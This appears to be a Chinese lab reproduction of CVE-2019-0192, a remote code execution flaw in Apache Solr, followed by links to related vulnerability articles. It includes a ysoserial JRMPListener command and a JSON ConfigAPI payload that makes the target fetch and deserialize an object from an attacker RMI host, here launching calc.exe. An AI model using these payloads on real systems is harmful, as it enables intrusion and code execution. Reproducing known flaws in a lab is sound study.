CVE-2019-019
近日根据网上得教程复现了CVE-2019-0192这个漏洞
1.漏洞说明
描述:Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory,并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象,这些对象将在Solr端使用java的ObjectInputStream反序列化,这被认为是不安全的。这种类型的漏洞可以利用ysoserial工具。根据目标类路径,攻击者可以使用其中一个“gadget chain”来触发Solr端上的远程代码执行。
原理:该漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。
受影响版本:Apache Solr < 7.0.0
安全版本:Apache Solr 7.0.0或者更高版本
2.实验环境
靶机环境:
靶机系统 Windows 10
JDK版本 jdk7u21
服务器 tomcat 7
Solr版本 solr–5.5.3
Solr 下载地址:http://archive.apache.org/dist/lucene/solr/5.5.3/
攻击机环境
攻击机系统 Windows 10
发包工具 burp
漏洞利用框架 ysoserial
下载地址:https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
3.攻击步骤及效果
(1)在靶机上将下载好的Solr安装成功后,启动Solr。
启动命令:solr -e techproducts --Dcom.sun.management.jmxremote
(2)启动后打开网页,输入网址 IP:8983
(3)攻击机切换到ysoserial目录下,打开CMD,输入命令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1234 Jdk7u21 calc.exe
(4)我们的目标路径是 IP:8983/solr/techproducts/config (靶机)
(5)打开攻击机利用burp抓包,改包后进行发包完成攻击
改包,添加content-type,以及具体的payload如下图所示
{“set-property” :{“jmx.serviceUrl” :“service:jmx:rmi:///jndi/rmi://192.168.96.132:1234/obj”}}
点击Go,成功在靶机上弹出计算器
参考:https://github.com/mpgn/CVE-2019-0192/
https://www.bilibili.com/video/av46568453/
https://blog.csdn.net/yalecaltech/article/details/88829590
- CVE-2019-0211 - Apache HTTP服务组件中的升级权限漏洞
- 研究人员发现思科路由器存在安全漏洞(CVE-2019-1652)
- Apache 提权漏洞(CVE-2019-0211)复现
- CVE-2019-0686|Microsoft Exchange特权提升漏洞补丁已发布
- CVE-2019-9193,PostgreSQL任意代码执行漏洞警报
- CVE-2019-1710 - Cisco IOS XR 64位软件关键安全漏洞警报
- CVE-2019-0199,Apache Tomcat DoS漏洞警报
- struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul
- CVE-2019-5736: runc容器逃逸漏洞警报
- CVE-2019-3398 - Confluence路径遍历漏洞警报
- struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul
- CVE-2019-1867:Cisco Elastic Services Controller REST API 身份验证绕过漏洞警报
- 再谈cve-2019-0708漏洞最新事情,更新poc及个人说明
- 利用LAPS武器化CVE-2019-0841
- Canonical发布Ubuntu 14.04 LTS的小型Linux内核安全更新(CVE-2019-6133)
- CVE-2019-3799:spring-cloud-config-server目录遍历漏洞警告
- Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
- CVE-2019-6340 - Drupal远程执行代码漏洞警报
- [EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞